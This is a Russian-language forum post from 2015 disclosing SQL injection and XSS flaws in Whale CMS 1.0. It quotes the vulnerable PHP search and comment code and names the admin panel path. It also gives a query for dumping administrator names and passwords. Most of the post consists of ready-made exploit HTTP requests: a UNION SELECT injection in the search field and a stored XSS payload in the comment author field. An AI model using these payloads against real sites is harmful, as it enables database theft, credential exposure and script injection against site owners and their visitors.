23.03.2015, 17:45
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
CMS: Whale CMS 1.0
Сайт: https://www.whale-cms.de
Админ панель: /backend/
Логин/пароль администратора: SELECT name, passwort from [PREFIX]_users;
SQL Injection и Reflected XSS:
Зависимости: MQ = OFF
/sys/template/include/suchen.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'newssuche'[/COLOR][COLOR="#007700"]];
echo[/COLOR][COLOR="#DD0000"]"Du hast nach dem Beitragtitel: \"[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#DD0000"]\" gesucht. Dadurch wurden folgende Einträge gefunden:
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"news WHERE titel LIKE '%"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newssuche[/COLOR][COLOR="#007700"]%.[/COLOR][COLOR="#DD0000"]"%' ORDER BY id DESC LIMIT 5"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$newssuche_ergebnis[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$newssuche_abfrage[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
...[/COLOR][/COLOR]
Эксплоит:
Код:
POST /?page=Home&action=suchen HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=Home
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
newssuche=' union select 1,2,3,4,version(),6,7,8,9,10,11--
Stored XSS и Error-Based SQL Injection:
/sys/template/include/newscontent.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"neueskommentarposten"[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentartext'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'kommentarautor'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"newskommentar (text, autor, datum, newsID) VALUES ('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommitext[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommiautor[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskommidatum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newskomminewsID[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$qu8[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{
...
}
else
{
echo[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]();
}[/COLOR][/COLOR]
Эксплоит:
Код:
POST /?page=News&id=35&action=neueskommentarposten HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=News&id=35
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
kommentarautor=">alert(/XSS/)&kommentartext=test
|
|
|